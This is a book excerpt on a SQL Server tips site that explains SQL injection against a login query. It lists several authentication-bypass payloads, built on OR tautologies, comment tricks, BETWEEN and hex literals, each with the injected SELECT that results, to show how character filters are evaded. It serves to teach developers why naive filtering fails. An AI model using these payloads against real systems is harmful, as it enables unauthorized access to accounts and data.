Oracle Consulting Oracle Training Oracle Support Development
Oracle Books
SQL Server Books
IT Books
Job Interview Books
Rampant Horse Books
911 Series
Pedagogue Books

Oracle Software
Write for Rampant
Publish with Rampant
Rampant News
Rampant Authors
Rampant Staff
Oracle News
Oracle Forum
Oracle Tips
Articles by our Authors
Press Releases
SQL Server Books

Oracle 11g Books

Oracle tuning

Oracle training

Oracle support

Remote Oracle


Privacy Policy


  SQL Server Tips by Burleson

Other Security Considerations

There are many other ways to disrupt the code, the previous example could be prevented by filtering "--" but there are more vulnerabilities.

The AND condition requires that both operands are true and one way to force that to happen is to add an OR to both inputs, followed by an empty string and an equal sign. This will result in ''='', which is true and the OR will be true because one operand is already true.

' OR ''=' ' OR ''='
SELECT username from Table_users WHERE logname='' OR ''='' AND userpassword='' OR ''=''

The multiline comment /* */ is legal between TSQL code and it can turn part of the logic into a comment. The log name could take any value because the password would be ignored and an OR operator with a true operand would force the result to be true.

'/* */ OR ''='
SELECT username from Table_users WHERE logname=''/*' AND userpassword='*/ OR ''=''

If the equal sign is filtered, other ones can be used:

' OR ''<'1 ' OR ''<'1
SELECT username from Table_users WHERE logname='' OR ''<'1' AND userpassword='' OR ''<'1'

If =, <, > are filtered, there is still the between command:

' OR '' between '' AND ' ' OR '' between '' AND '
SELECT username from Table_users WHERE logname='' OR '' between '' AND '' AND userpassword='' OR '' between '' AND ''

If the filter removes empty strings or rejects input with more than two single quotes, it is still possible to insert a string by using its hexadecimal representation:

' OR 0x00<'abc ' OR 0x00<'abc
SELECT username from Table_users WHERE logname='' OR 0x00<'abc' AND userpassword='' OR 0x00<'abc'

Another approach is to try guessing the column names and turn the string delimiters into empty strings:

'+logname+' '+userpassword+'
SELECT username from Table_users WHERE logname=''+logname+'' AND userpassword=''+userpassword+''

The above book excerpt is from:

Super SQL Server Systems
Turbocharge Database Performance with C++ External Procedures

ISBN: 0-9761573-2-2
Joseph Gama, P. J. Naughter  

Linux Oracle commands syntax poster

ION Oracle tuning software

Oracle data dictionary reference poster

Oracle Forum

BC Oracle consulting support training

BC remote Oracle DBA   



 Copyright © 1996 -2017 by Burleson. All rights reserved.

Oracle® is the registered trademark of Oracle Corporation. SQL Server® is the registered trademark of Microsoft Corporation. 
Many of the designations used by computer vendors to distinguish their products are claimed as Trademarks

Hit Counter